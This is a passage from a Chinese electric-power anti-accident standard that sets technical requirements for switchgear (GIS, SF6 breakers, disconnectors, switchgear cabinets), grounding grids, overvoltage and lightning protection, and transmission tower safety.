缩短检测时间,以掌握SF6电流互感器气体微水量变化趋势。 13 防止开关设备事故的重点要求 13.1 防止气体绝缘金属封闭开关设备(GIS、包括HGIS)、SF6断路器事故 13.1.1 户内布置的GIS、六氟化硫(SF6)开关设备室,应配置相应的SF6泄 漏检测报警、事故排风及氧含量检测系统。 13.1.2 开关设备二次回路及元器件应满足以下要求: (1)应加强开关设备二次回路专业管理,断路器分、合闸控制回路应简单 可靠,防止误动、拒动。应加强时间继电器等元器件选型管理,优化断路器本体 三相不一致回路设计,定期开展维护检修。 (2)列入国家市场监督管理总局强制性产品认证目录的二次元件应取得 “3C”认证,外壳绝缘材料阻燃等级应满足 V-0 级塑料阻燃等级要求。 129 (3)新订货断路器机构动作次数计数器不应带有复归功能。 (4)断路器分、合闸控制回路的端子间应有端子隔开,或采取其他有效防 误动措施。新安装的分相弹簧机构断路器的防跳继电器、非全相继电器不应安装 在机构箱内,应装在独立的汇控箱内。 (5)断路器出厂试验、交接试验及例行试验中,应进行三相不一致、防跳、 压力闭锁等二次回路动作特性检查,并保证在模拟手合于故障条件下断路器不会 发生跳跃现象。 (6)252kV及以上断路器应具备双跳闸线圈机构。 13.1.3 开关设备用气体密度继电器应满足以下要求: (1)新安装的252kV及以上电压等级的GIS和SF6断路器的密度继电器与开 关设备本体之间的连接方式应满足不拆卸校验密度继电器的要求。 (2)密度继电器应装设在与被监测气室处于同一运行环境温度的位置。对 于严寒地区的设备,其密度继电器应满足环境温度在-40℃~-25℃时准确度不低 于2.5级的要求。 (3)新安装252kV及以上断路器每相应独立安装气体密度继电器且气体密 度继电器应有双套压力闭锁接点。三相分箱的GIS母线及断路器气室,相间不应 采用管路连接。 (4)断路器应配防振型密度继电器。 (5)密度继电器表计应朝向巡视通道,有条件时可选用数字化远传表计。 (6)户外安装的密度继电器应设置防雨箱(罩),密度继电器防雨箱(罩) 应能将表、控制电缆接线端子一起放入,防止指示表、控制电缆接线盒进水受潮。 13.1.4 开关设备机构箱、汇控箱内应有完善的驱潮防潮装置,防止凝露造成 二次设备损坏。应加强开关设备机构箱、汇控箱的检查维护,保证箱体密封良好, 防雨、防尘、通风、防潮等性能良好,并保持内部干燥清洁。 13.1.5 生产厂家在防爆膜设计选型时,应保证设备最高运行压力低于防爆膜 最低爆破压力,罐体和套管等部件的最小破坏压力高于防爆膜的最高爆破压力, 并保留足够裕度。装配前应检查并确认防爆膜是否受外力损伤,装配时应保证防 爆膜泄压方向正确、定位准确,防爆膜泄压挡板的结构和方向应避免在运行中积 水、结冰、误碰。防爆膜喷口不应朝向巡视通道。 130 13.1.6 新订货的GIS及SF6断路器年泄漏率应不高于0.5%。户外GIS法兰对接 面宜采用双密封,并宜在法兰接缝、安装螺孔、跨接片接触面周边、法兰对接面 注胶孔、盆式绝缘子浇注孔等部位涂防水胶。 13.1.7 断路器和GIS内部的绝缘件装配前应通过工频耐压试验和局部放电 试验,单个绝缘件的局部放电量不大于3pC。GIS内部的绝缘件装配前应逐支通 过X射线探伤试验。 13.1.8 户外瓷柱式断路器、罐式断路器、GIS、隔离开关绝缘子金属法兰与 瓷件的胶装部位出厂时应涂有性能良好的防水密封胶。检修时应检查瓷绝缘子胶 装部位防水密封胶完好性,必要时复涂防水密封胶。 13.1.9 GIS、罐式断路器现场安装过程中,应采取有效的防尘措施,如移 动厂房、防尘帐蓬等,GIS的孔、盖等打开时,应使用防尘罩进行封盖。安装现 场环境太差、尘土较多或相邻部分正在进行土建施工或作业区相对湿度大于 80%、阴雨天气时,不应开展GIS清理、检查、装配工作。作业人员进入罐体内 安装时,应穿着专用洁净防尘服,带入罐内的工具及用品应清洁。 13.1.10 SF6开关设备现场安装过程中,在进行抽真空处理时,应采用出口带 有电磁阀的真空处理设备,且在使用前应检查电磁阀动作可靠,防止抽真空设备 意外断电造成真空泵油倒灌进入设备内部。并且在真空处理结束后应检查抽真空 管的滤芯是否有油渍。为防止真空度计水银倒灌进设备中,不应使用麦氏真空计。 13.1.11 SF6新气体应经抽检合格、回收后SF6气体则应全部检测,并出具检测 报告后方可使用。 13.1.12 SF6气体注入设备后应进行湿度试验,且应对设备内气体进行SF6纯 度检测,必要时进行气体成份分析。运行中,应加强SF6气体压力、微水监督, 防止开关设备因气体压力过低或微水超标导致绝缘降低。 13.1.13 加强开关设备外绝缘的清扫或采取相应的防污闪措施,当发电机组 并网断路器断口外绝缘积雪、严重积污时不得进行启机并网操作。 13.1.14 新订货断路器应优先选用弹簧机构、液压机构(包括弹簧储能液压 机构)。 13.1.15 加强投切无功补偿装置用断路器的选型管理工作。新订货的投切并 联电容器、交流滤波器用断路器应选用C2级断路器,且型式试验项目应包含投 131 切电容器组试验;所用真空断路器灭弧室出厂前应整台进行老炼试验,并提供老 炼试验报告。 13.1.16 为防止机组并网断路器单相异常导通造成机组损伤,252kV及以下 机组并网的断路器(含发电机断路器)应选用三相机械联动式结构。新订货252kV 母联(分段)、主变压器、高压电抗器断路器宜选用三相机械联动设备。 13.1.17 断路器液压机构应具有防止失压后慢分慢合的机械装置。液压机构 验收、检修时应对机构防慢分慢合装置的可靠性进行试验。断路器液压机构突然 失压时应申请停电处理。在设备停电前,不应人为启动油泵,防止断路器慢分。 13.1.18 机组并网断路器宜在并网断路器与机组侧隔离开关间装设带电显示 装置,在并网操作时先合入并网断路器的母线侧隔离开关,确认装设的带电显示 装置显示无电时方可合入并网断路器的机组/主变侧隔离开关。 13.1.19 GIS用断路器、隔离开关和接地开关以及罐式六氟化硫断路器,出厂 试验时应进行不少于200次的机械操作试验(其中断路器每100次操作试验的最后 20 次应为重合闸操作试验),以保证触头充分磨合。200次操作完成后应彻底清 洁壳体内部,再进行其他出厂试验。直流断路器产品出厂试验时进行200次单分 单合试验,不进行重合闸操作。 13.1.20 加强断路器合闸电阻的检测和试验,防止断路器合闸电阻缺陷引发 故障。断路器安装阶段,应确认合闸电阻装配正确完好。在断路器产品出厂试验、 交接试验及例行试验中,应对断路器主触头与合闸电阻触头的时间配合关系进行 测试,有条件时应测量合闸电阻的阻值。 13.1.21 为防止因合闸电阻过热导致的断路器损坏,对于新订货的带合闸电 阻断路器,生产厂家应在使用说明书中对合闸电阻允许运行工况进行说明,在运 带合闸电阻的瓷柱式断路器在规定时间内合闸或重合闸次数达到规定值时,可采 用临时停用重合闸等措施防止合闸电阻炸裂。长线路破口改接工程,若操作过电 压计算确定两侧断路器不需要配置合闸电阻,宜结合改建工程同步拆除在运断路 器合闸电阻。 13.1.22 在断路器产品出厂试验、交接试验及例行试验中,应测试断路器均 压电容与断路器断口并联后的电容量及介质损耗因数。 13.1.23 用于投切并联电容器的真空断路器应在交接试验和大修后对合闸弹 132 跳时间和分闸反弹幅值进行检测。 13.1.24 弹簧机构断路器应定期进行机械特性试验,防止机构特性变化等原 因造成的机构拒动或异常动作。应结合例行试验加强凸轮间隙、线圈铁芯间隙、 弹簧预压缩量等关键尺寸测量和重要活动部件润滑,必要时开展弹簧性能评估。 13.1.25 新订货的用于低温(年最低温度为-30℃及以下)、日温差超过25K、 重污秽e级或沿海d级地区、城市中心区、周边有重污染源(如钢厂、化工厂、水 泥厂等)的363kV及以下GIS,应采用户内安装方式,550kV及以上GIS经充分论 证后确定布置方式。 13.1.26 GIS应选用技术成熟、性能良好的产品类型,宜结合设计、制造、安 装、验收等全过程管理开展技术监督、技术符合性评估等质量管控工作,保障设 备运行可靠性。有条件时可选用具有“一键顺控”双确认功能的设备。 13.1.27 363kV及以上GIS电流互感器宜采用外置结构。 13.1.28 为便于试验和检修,双母线、单母线或桥形接线中,新订货GIS母 线避雷器和电压互感器应设置独立的隔离开关。3/2断路器接线中,新订货GIS 母线避雷器和电压互感器不应装设隔离开关,宜设置可拆卸导体作为隔离装置。 架空进线的GIS线路间隔的避雷器和线路电压互感器宜采用外置结构。 13.1.29 GIS气室应划分合理,并满足以下要求: (1)新投运的GIS最大气室的气体处理时间不超过8h。252kV及以下设备单 个气室长度不超过15m,且单个主母线气室对应间隔不超过3个。 (2)双母线结构的GIS,同一间隔的不同母线隔离开关应各自设置独立隔 室。252kV及以上GIS母线隔离开关不应采用与母线共隔室的设计结构。 13.1.30 新订货的252kV及以上GIS宜加装内置局部放电传感器。采用带金属 法兰的盆式绝缘子时,应预留窗口用于特高频局部放电检测。 13.1.31 同一GIS间隔内的多台隔离开关的电机电源,应分别设置独立的开 断设备。电动操动机构内应装设一套能可靠切断电动机电源的过载保护装置。电 机电源消失时,控制回路应解除自保持。 13.1.32 三相机械联动GIS隔离开关,应在从动相同时安装可靠的分/合闸指 示器。 13.1.33 新订货的户外GIS法兰跨接片应安装在GIS外壳上的专用跨接部位, 133 不应通过法兰螺栓直连。 13.1.34 GIS穿墙壳体与墙体间应采取防护措施,穿墙部位采用非腐蚀性、非 导磁性材料进行封堵,墙外侧做好防水措施。 13.1.35 GIS安装过程中应对导体是否插接良好进行检查,且回路电阻测试合 格,特别对可调整的伸缩节及电缆连接处的导体连接情况应进行重点检查。 13.1.36 在厂内具备条件情况下,GIS出厂绝缘试验宜在装配完整的间隔上 进行,550kV 及以上设备可以试验形态为单位进行绝缘试验。252kV及以上设备 还应进行正负极性各3次雷电冲击耐压试验。 13.1.37 严格按有关规定对新装GIS、罐式断路器进行现场耐压,耐压过程 中应进行局部放电检测,有条件时可对GIS设备进行现场冲击耐压试验。GIS出 厂试验、现场交接耐压试验中,如发生放电现象,不管是否为自恢复放电,均应 解体或开盖检查、查找放电部位。对发现有绝缘损伤或有闪络痕迹的绝缘部件均 应进行更换。 13.1.38 应加强运行中GIS和罐式断路器的带电局放检测工作。在大修后应 进行局放检测,在大负荷前、经受短路电流冲击后必要时应进行局放检测,对于 局放量异常的设备,应同时结合气体检测等手段进行综合分析和判断。 13.2 防止敞开式隔离开关、接地开关事故 13.2.1 隔离开关和接地开关应选择能够防止主回路过热、操作卡滞、金属部 件腐蚀、瓷瓶断裂等典型问题的成熟产品,应具备电动操作功能,有条件时可选 用具有隔离开关分合闸位置双确认的“一键顺控”功能的设备。 13.2.2 风沙活动严重、严寒、重污秽、多风地区以及采用悬吊式管形母线的 变电站,不宜选用配钳夹式触头的单臂伸缩式隔离开关。 13.2.3 敞开式隔离开关与其所配装的接地开关之间应有可靠的机械联锁,机 械联锁应有足够的强度。发生电动或手动误操作时,设备应可靠联锁。 13.2.4 隔离开关应具备防止自动分闸的结构设计。安装和检修时应检查并确 认隔离开关主拐臂调整应过死点;检查平衡弹簧的张力应合适。 13.2.5 敞开式隔离开关和接地开关应在生产厂家内进行整台组装和出厂试 验。需拆装发运的设备应按相、按柱作好标记,其连接部位应作好特殊标记。 13.2.6 敞开式隔离开关瓷绝缘子出厂前应逐只进行无损探伤,252kV及以上 134 隔离开关安装后应对绝缘子逐只探伤。对运行10年以上的老旧敞开式隔离开关, 应加强绝缘子检查。 13.2.7 新安装或检修后的隔离开关应进行导电回路电阻测试。 13.2.8 隔离开关运行中倒闸操作,应尽量采用电动操作,并远离隔离开关, 如发现卡滞应停止操作并进行处理,不应强行操作。合闸操作时,应确保合闸到 位,伸缩式隔离开关应检查驱动拐臂过“死点”。有条件时,可优先采取“一键顺 控”等遥控方式完成倒闸操作。 13.2.9 在运行巡视时,应注意隔离开关、母线支柱绝缘子瓷件及法兰无裂纹, 夜间巡视时应注意瓷件无异常电晕现象。 13.2.10 加强对隔离开关导电部分、转动部分、操动机构、瓷绝缘子法兰胶 装位置及电气闭锁装置等的检查,防止机械卡滞、触头过热、绝缘子断裂等故障 的发生。隔离开关各运动部位用润滑脂宜采用性能良好的航空润滑脂。 13.2.11 定期用红外测温设备检查隔离开关设备的接头、导电部分,特别是 在重负荷或高温期间,加强对运行设备温升的监视,发现问题应及时采取措施。 13.3 防止高压开关柜事故 13.3.1 开关柜应选用具备运行连续性功能的高压开关柜(LSC2类)、防止 电气误操作(“五防”)功能完备的产品,有条件时可选用具有“一键顺控”功能的 开关柜。新投开关柜应装设具有自检功能的带电显示装置,并与接地开关(柜门) 实现强制闭锁,带电显示装置应装设在仪表室。 13.3.2 新订货的空气绝缘开关柜的外绝缘应满足以下条件: (1)空气绝缘净距离应满足表13-1的要求: 表13-1 开关柜空气绝缘净距离要求 空气绝缘净距离(mm) 7.2kV 12kV 24kV 40.5kV 相间和相对地 ≥100 ≥125 ≥180 ≥300 带电体至门 ≥130 ≥155 ≥210 ≥330 (2)最小标称统一爬电比距:≥ 3 ×18mm/kV (对瓷质绝缘),≥ 3 ×20mm/kV (对有机绝缘)。 (3)新安装开关柜不应使用绝缘隔板。母线加装绝缘护套和热缩绝缘材料 后,空气绝缘净距离也应满足要求。 135 13.3.3 开关柜应选用经试验验证能满足在内部电弧情况下保护人员规定要 求的高压开关柜(内部故障 IAC 级别),生产厂家应提供相应型式试验报告(附 试验试品照片)。选用开关柜时应确认其母线室、断路器室、电缆室相互独立, 且均通过相应内部燃弧试验;燃弧时间应不小于0.5s,试验电流为额定短时耐受 电流。 13.3.4 开关柜各高压隔室均应设有泄压通道或压力释放装置。当开关柜内产 生内部故障电弧时,压力释放装置应能可靠打开,压力释放方向应避开巡视通道 和其他设备。 13.3.5 高压开关柜内避雷器、电压互感器等柜内设备应经隔离开关(或隔离 手车)与母线相连,不应与母线直接连接。其前面板模拟显示图应与其内部接线 一致,开关柜可触及隔室、不可触及隔室、活门和机构等关键部位在出厂时应设 置明显的安全警告、警示标识。柜内隔离金属活门应可靠接地,活门机构应选用 可独立锁止的结构,防止检修时人员失误打开活门。 13.3.6 高压开关柜内的绝缘件(如绝缘子、套管、隔板和触头罩等)应采用 阻燃绝缘材料。 13.3.7 新安装的24kV及以上开关柜内的穿柜套管应采用双屏蔽结构,其等 电位连线(均压环)应长度适中,并与母线及部件内壁可靠连接。 13.3.8 开关柜的观察窗应能满足安全要求、便于观察,并通过开关柜内部燃 弧试验。未经型式试验考核前,不得进行柜体开孔等降低开关柜内部故障防护性 能的改造。 13.3.9 新建变电站的站用变压器、接地变压器不应布置在开关柜内或紧靠开 关柜布置,避免其故障时影响开关柜运行。 13.3.10 应在开关柜配电室配置空调、除湿机等有效的除湿防潮设备,防止 凝露导致绝缘事故。 13.3.11 开关柜中所有绝缘件装配前均应进行局放检测,单个绝缘件局部放 电量不大于3pC。 13.3.12 开关柜内真空断路器灭弧室出厂前应逐台进行老炼试验,并提供老 炼试验报告。 13.3.13 基建中高压开关柜在安装后应对其一、二次电缆进线处采取有效封 136 堵措施。 13.3.14 为防止开关柜火灾蔓延,在开关柜的柜间、母线室之间及与本柜其 它功能隔室之间应采取有效的封堵隔离措施。 13.3.15 高压开关柜应检查泄压通道或压力释放装置,确保与设计图纸保持 一致。 13.3.16 开关柜操作应平稳无卡滞,不应强行操作。新开关柜安装后,应检 查手车触头插入深度,满足厂家技术要求。 13.3.17 定期开展开关柜超声波局部放电、暂态地电压等带电检测,及早发 现开关柜内绝缘缺陷,防止由开关柜内部局部放电演变成短路故障。 13.3.18 应通过无线测温、红外窗口测温等方式加强总路(进线)、分段等 大电流开关柜柜内温度检测。对温度异常的开关柜强化监测、分析和处理,防止 导电回路过热引发的柜内短路故障。 13.3.19 加强带电显示闭锁装置的运行维护,保证其与柜门间强制闭锁的运 行可靠性。 14 防止接地网和过电压事故的重点要求 14.1 防止接地网事故 14.1.1 在新建变电站工程设计中,应掌握工程地点的地形地貌、土壤的种类 和分层状况,并提高土壤电阻率的测试深度,当采用四极法时,测试电极极间距 离一般不小于拟建接地装置的最大对角线,测试条件不满足时至少应达到最大对 角线的2/3。 14.1.2 在新建工程设计中,校验接地引下线热稳定所用电流应不小于远期可 能出现的最大值,有条件地区可按照断路器额定开断电流考核;接地装置接地体 的截面积不小于连接至该接地装置接地引下线截面积的75%。并提供接地装置的 热稳定容量计算报告。在扩建工程设计中,应对前期已投运的接地装置进行热稳 定容量校核,不满足要求的必须进行改造。 14.1.3 在接地网设计时,应考虑分流系数的影响,计算确定流过设备外壳接 地导体(线)和经接地网入地的最大接地故障不对称电流有效值。 14.1.4 对于110kV(66kV)及以上新建、改建变电站,在中性或酸性土壤地 137 区,接地装置选用热镀锌钢为宜,在强碱性土壤地区或者其站址土壤和地下水条 件会引起钢质材料严重腐蚀的中性土壤地区,宜采用铜质、铜覆钢(铜层厚度不 小于0.25mm)或者其它具有防腐性能材质的接地网。对于室内变电站及地下变 电站应采用紫铜材料的接地网。铜材料间或铜材料与其他金属间的连接,须采用 放热焊接,不得采用电弧焊接或压接。 14.1.5 施工单位应严格按照设计要求进行施工,预留设备、设施的接地引下 线必须经确认合格,隐蔽工程必须经监理单位和建设单位验收合格,在此基础上 方可回填土。同时,应分别对两个最近的接地引下线之间测量其回路电阻,测试 结果是交接验收资料的必备内容,竣工时应全部交甲方备存。隐蔽工程应留存施 工过程资料和验收资料。 14.1.6 接地装置的焊接质量必须符合有关规定要求,各设备与主接地网的连 接必须可靠,扩建接地网与原接地网间应为多点连接。接地线与主接地网的连接 应用焊接,接地线与电气设备的连接宜用螺栓,且设置防松螺帽或防松垫片。 14.1.7 变压器中性点应有两根与接地网主网格的不同边连接的接地引下线, 并且每根接地引下线均应符合热稳定校核的要求。主设备及设备架构等应有两根 与主接地网不同干线连接的接地引下线,并且每根接地引下线均应符合热稳定校 核的要求。接地引下线应便于定期进行检查测试。 14.1.8 6~66kV不接地、谐振接地和高电阻接地的系统,改造为低电阻接地 方式时,应重新核算杆塔和接地网接地阻抗值及热稳定性。 14.1.9 新建变电站围墙范围内接地网宜一次性建成,变电站内接地装置宜采 用同一材料。当采用不同材料进行混连时,地下部分应采用统一材料连接。 14.1.10 对于高土壤电阻率地区的接地网,在接地阻抗难以满足要求时,应 采取有效的均压及隔离措施,防止人身及设备事故,方可投入运行。对弱电设备 应采取有效的隔离或限压措施,防止接地故障时地电位的升高造成设备损坏。 14.1.11 接地阻抗测试宜在架空地线(普通避雷线、OPGW光纤地线)与变 电站出线构架连接之前、双端接地的电缆护套与主接地网连接之前完成,若在上 述连接完成之后且无法全部断开测量时,应采用分流向量法进行接地阻抗的测 试,对于不满足设计要求的接地网及时进行降阻改造。 14.1.12 对于已投运的接地装置,应每年根据变电站短路容量的变化,校核 138 接地装置(包括设备接地引下线)的热稳定容量。对于变电站中的不接地、经消 弧线圈接地、经高阻接地等小电流接地系统,必须按异点两相接地故障校核接地 装置的热稳定容量。 14.1.13 投运 10 年及以上的非地下变电站接地网,应定期开挖(间隔不大 于 5 年),抽检接地网的腐蚀情况,每站抽检5~8个点。铜质材料接地体地网整 体情况评估合格的不必定期开挖检查。 14.2 防止雷电过电压事故 14.2.1 设计阶段应因地制宜开展防雷设计,除地闪密度小于0.78次/(平方千 米•年)的雷区外,220kV及以上线路一般应全线架设双地线,110kV线路应全线 架设地线。地闪密度大于等于0.78次/(平方千米•年)的新能源场站,35kV架空 集电线路宜架设双避雷线。 14.2.2 对符合以下条件之一的敞开式变电站应在110~220kV进出线间隔入 口处加装金属氧化物避雷器: (1)变电站所在地区近3年雷电监测系统记录的平均落雷密度不小于3.5次/ (平方千米•年); (2)变电站110~220kV进出线路走廊在距变电站15km范围内穿越雷电活动 频繁(近3年雷电监测系统记录的平均落雷密度大于等于2.8次/(平方千米•年) 的丘陵或山区; (3)变电站已发生过雷电波侵入造成断路器等设备损坏; (4)经常处于热备用状态的线路。 14.2.3 500kV及以上电压等级线路,设计阶段应计算线路雷击跳闸率,若大 于控制参考值【折算至地闪密度2.78次/(平方千米•年)】,则应对500kV(750kV) 及以上电压等级的超、特高压线路按段进行雷害风险评估,对高雷害风险等级 (Ⅲ、Ⅳ级)的杆塔采取防雷优化措施。500kV以下电压等级线路可参照执行。 14.2.4 在设计阶段,500kV交流线路处于C2及以上雷区的线路区段,其保护 角设计值减小5°。其他电压等级线路地线保护角参考相应设计规范执行。 14.2.5 在设计阶段,杆塔接地电阻设计值应参考相关标准执行,对220kV及 以下电压等级线路,若杆塔处土壤电阻率大于1000Ω•m,且地闪密度处于C1及以 上雷区,则接地电阻较设计规范宜降低5Ω。 139 14.2.6 架空输电线路的防雷措施应按照输电线路在电网中的重要程度、线路 走廊雷电活动强度、地形地貌及线路结构的不同,进行差异化配置,重点加强重 要线路以及多雷区、强雷区内杆塔和线路的防雷保护。新建和运行的重要线路, 应综合采取减小地线保护角、改善接地装置、适当加强绝缘等措施降低线路雷害 风险。针对雷害风险较高的杆塔和线段宜采用线路避雷器保护或预留加装避雷器 的条件。 14.2.7 在土壤电阻率较高地段的杆塔,可采用增加垂直接地体、加长接地带、 改变接地形式、换土或采用接地模块等措施降低杆塔接地电阻值。 14.2.8 线路雷击跳闸后,即使断路器重合成功仍需检查故障录波装置、查询 雷电定位系统,分析断路器分断300ms内电流波形和周边落雷情况。如确认断路 器因遭受多重雷击导致断口击穿后,应尽量避免对该断路器进行操作,尽快泄压 并进行解体检查。 14.2.9 加强避雷线运行维护工作,定期打开部分线夹检查,保证避雷线与杆 塔接地点可靠连接。对于具有绝缘架空地线的线路,要加强放电间隙的检查与维 护,确保动作可靠。 14.2.10 严禁利用避雷针、变电站构架和带避雷线的杆塔作为低压线、通信 线、广播线、电视天线的支柱。 14.2.11 每年雷雨季节前开展:(1)接地电阻测试,对不满足要求的杆塔及 时进行降阻改造。(2)定期(不大于5年)对接地装置开挖抽查。(3)定期(不 大于5年)对线路避雷器进行抽检。 14.3 防止变压器过电压事故 14.3.1 切合110kV及以上有效接地系统中性点不接地的空载变压器时,应先 将该变压器中性点临时接地。 14.3.2 为防止在有效接地系统中不接地变压器中性点出现高幅值的雷电、工 频过电压,对中性点额定雷电冲击耐受电压大于185kV的110~220kV不接地变压 器,中性点过电压保护应采用无间隙避雷器保护;对于110kV变压器,当中性点 额定雷电冲击耐受电压不大于185kV时,原则上应优先采用水平布置的间隙保护 方式,对已采用间隙并联避雷器的组合保护方式仍可继续保留使用。对于间隙, 在雷雨季节前或间隙动作后,应检查间隙的烧损情况并校核间隙距离。 140 14.3.3 对于低压侧有空载运行或者带短母线运行可能的变压器,宜在变压器 低压侧装设避雷器进行保护。对中压侧有空载运行可能的变压器,中性点有引出 的可将中性点临时接地,中性点无引出的应在中压侧装设避雷器。 14.3.4 新建变压器户外10kV出口侧应选用提高外绝缘水平的出线避雷器, 并使其达到出线侧支柱绝缘子的外绝缘水平。 14.4 防止谐振过电压事故 14.4.1 为防止110kV及以上电压等级断路器断口均压电容与母线电磁式电 压互感器发生谐振过电压,可通过改变运行和操作方式避免形成谐振过电压条 件。新建或改造敞开式变电站应选用电容式电压互感器。 14.4.2为防止中性点非直接接地系统发生由于电磁式电压互感器饱和产生的 铁磁谐振过电压,可采取以下措施: (1)选用励磁特性饱和点较高的,在1.9Un/ 电压下,铁芯磁通不饱和的电 压互感器,且三相在0.2、0.5、0.8、1.0、1.2倍额定电压下的励磁电流偏差不超 过30%; (2)在电压互感器(包括系统中的用户站)一次绕组中性点对地间宜串接 零序电压互感器或其它消除此类谐振的装置; (3)10kV及以下用户电压互感器一次中性点应不直接接地。 14.4.3 电磁式电压互感器谐振后(特别是长时间谐振后),应进行励磁特性试 验并与初始值比较,在0.2、0.5、0.8、1.0、1.2倍额定电压下的励磁电流偏差不 超过30%。严禁在发生长时间谐振后未经检查将设备投入运行。 14.5 防止弧光接地过电压事故 14.5.1 对于中性点不接地的6~66kV系统,应根据电网发展每3~5年进行一次 电容电流测试,已装设消弧线圈的变电站可参考控制器中的电容电流数值。在消 弧线圈布置上,应避免由于运行方式改变出现部分系统无消弧线圈补偿的情况。 对于已经安装消弧线圈、单相接地故障电容电流依然超标的应当采取消弧线圈增 容或者采取分散补偿方式,消弧线圈宜采用过补偿运行方式,脱谐度不大于15%; 对于系统电容电流大于150A及以上的,也可以根据系统实际情况改变中性点接 地方式或者采用分散补偿。 14.5.2 对于自动调谐消弧线圈,在招标采购阶段应要求生产厂家提供系统电 141 容电流测试及跟踪功能试验报告。自动调谐消弧线圈投入运行后,应定期(时间 间隔不大于3年),根据实际测量的系统电容电流对其自动调谐功能的准确性进 行校核。 14.5.3 变电站6~66kV各段母线,因地制宜可配置消弧线圈或主动干预型消 弧装置。不接地和谐振接地系统发生单相接地时,应按照就近、快速隔离故障的 原则尽快切除故障线路或区段。尤其对于与66kV及以上电压等级电缆同隧道、 同电缆沟、同桥梁敷设的纯电缆线路,应全面采取有效防火隔离措施,并开展安 全性与可靠性评估,应尽量缩短切除故障线路时间,降低发生弧光接地过电压的 风险。 14.6 防止无间隙金属氧化物避雷器事故 14.6.1 对于强风地区变电站避雷器应采取差异化设计,避雷器均压环应采取 增加固定点、支撑筋数量及支撑筋宽度等加固措施。 14.6.2 220kV及以上电压等级瓷外套避雷器安装前应检查避雷器上下法兰是 否胶装正确,下法兰应设置排水孔。 14.6.3 对金属氧化物避雷器,应坚持在运行中按规程要求进行带电试验。 35~330kV电压等级金属氧化物避雷器可用带电测试替代定期停电试验。500kV 及以上电压等级金属氧化物避雷器宜进行停电检测。 14.6.4 避雷器运行中持续电流检测(带电),330kV及以上电压等级的避雷 器应每6个月进行一次,220kV及以下的避雷器每年检测 1 次,检测应在雷雨季 节前进行。测试数据应包括全电流及阻性电流,且不超过规程允许值。 14.6.5 110kV(66 kV)及以上电压等级避雷器应安装与电压等级相符的交流 泄漏电流在线监测表计。对已安装在线监测表计的避雷器,有人值班的变电站每 天至少巡视一次,每半月记录一次,并加强数据分析。无人值班变电站可结合设 备巡视周期进行巡视并记录,强雷雨天气后应进行特巡。 14.6.6 对运行15年及以上的避雷器应重点跟踪泄漏电流的变化,停运后应重 点检查压力释放板是否有变色、锈蚀或破损。 14.7 防止避雷针事故 14.7.1 构架避雷针设计时应统筹考虑站址环境条件、配电装置构架结构形式 等,采用格构式避雷针或圆管型避雷针等结构形式。 142 14.7.2 构架避雷针结构形式应与构架主体结构形式协调统一,通过优化结构 形式,有效减小风阻。构架主体结构为钢管人字柱时,宜采用变截面钢管避雷针; 构架主体结构采用格构柱时,宜采用变截面格构式避雷针。构架避雷针如采用管 型结构,法兰连接处应采用有劲肋板法兰刚性连接。 14.7.3 在严寒大风地区的变电站,避雷针设计应考虑风振的影响,结构型式 宜选用格构式,以降低结构对风荷载的敏感度;当采用圆管型避雷针时,应严格 控制避雷针针身的长细比。根据运行条件对风载进行评估后,按照设计原则选用 适合强度等级的螺栓,螺栓规格不小于M20,双帽双垫,并加强螺栓采购的品控 工作。结合环境条件,避雷针钢材应具有冲击韧性的合格保证。 14.7.4 钢管避雷针底部应设置有效排水孔,防止内部积水锈蚀或结冰。 14.7.5 在非高土壤电阻率地区,独立避雷针的接地电阻不宜超过10Ω。当有 困难时,该接地装置可与主接地网连接,但避雷针与主接地网的地下连接点至 35kV及以下电压等级设备与主接地网的地下连接点之间,沿接地体的长度不得 小于15m。 14.7.6 定期(不超过6年)或在接地网结构发生改变后,进行独立避雷针接 地装置接地阻抗检测,当测试值大于10Ω时应采取降阻措施,必要时进行开挖检 查。独立避雷针接地装置与主接地网之间导通电阻应大于500mΩ。 15 防止架空输电线路事故的重点要求 15.1 防止倒塔(杆)事故 15.1.1 规划阶段,应对特高压密集通道开展多回同跳风险评估,必要时采取 差异化设计。当特高压线路在滑坡等地质不良地区同走廊架设时,宜满足倒塔距 离要求。 15.1.2 线路设计时应避让可能引起杆塔倾斜和沉降的崩塌、滑坡、泥石流、 岩溶塌陷、地裂缝等不良地质灾害区。 15.1.3 线路设计时宜避让采动影响区,无法避让时,应进行稳定性评价,合 理选择架设方案及基础型式,宜采用单回路或单极架设,必要时加装在线监测装 置。 15.1.4 特殊地形和极端恶劣气象环境条件下的重要输电线路宜采取差异化 143 设计,适当提高防冰、防洪、防风等设防水平。 15.1.5 设计阶段,对于易发生水土流失、山洪冲刷等地段的杆塔,应采取加 固基础、修筑挡土墙(桩)、截(排)水沟、改造上下边坡等措施,必要时改迁 路径。 15.1.6 设计阶段,分洪区等受洪水冲刷影响的基础,应考虑洪水冲刷作用及 漂浮物的撞击影响,并采取相应防护措施。 15.1.7 设计阶段,高寒地区线路应采用合理的基础型式和必要的地基防护措 施,避免基础冻胀导致的位移和永冻层融化导致的下沉。 15.1.8 对于移动或半移动沙丘等区域的杆塔,应采取围栏种草、草方格、碎 石压沙等防风固沙措施,且设计时应考虑主导风向等影响因素。 15.1.9 隐蔽工程应留有影像资料,并经监理单位质量验收合格后方可隐蔽; 竣工验收时运行单位应检查隐蔽工程影像资料的完整性,并进行必要的抽检。 15.1.10 铁塔现场组立前应对紧固件螺栓、螺母及铁附件进行抽样检测,经 确认合格后方可使用。地脚螺栓直径级差宜在6mm及以上,螺杆顶面、螺母顶面 或侧面加盖规格钢印标记,安装前应对螺杆、螺母型号进行匹配。架线前应对地 脚螺栓紧固及螺纹打毛情况进行检查,地脚螺栓紧固不到位或螺纹未打毛时严禁 架线作业和保护帽施工;但8.8级、10.9级的高强度地脚螺栓不采用螺纹打毛措施。 15.1.11 对于山区线路,设计单位应设计余土处理方案,且施工单位应严格 执行余土处理方案。 15.1.12 运维单位宜结合本单位实际,按照分级储备、集中使用的原则,确 定事故抢修塔的合理数量并予以储备。 15.1.13 恶劣天气后,应开展线路特巡。对于发生导地线覆冰或舞动的线路, 应做好观测记录和影像资料的收集,并进行杆塔螺栓松动、金具磨损等专项检查 及消缺。对发生大风和强降雨的线路,应做好杆塔基础及护坡、排水沟和挡土墙 等设施检查,发现异常及时处置。 15.1.14 加强杆塔基础的检查和维护,对取土、挖沙、采石、堆积、掩埋、 水淹等可能危及杆塔基础安全的行为,应及时制止并采取相应防范措施。 15.1.15 应采用可靠、有效的在线监测设备加强特殊区段的运行监测。 15.1.16 加强拉线塔的保护和维修。拉线下部应采取可靠的防盗、防割措施; 144 应及时更换锈蚀严重的拉线和拉棒;对易受撞击的杆塔和拉线,应采取有效的防 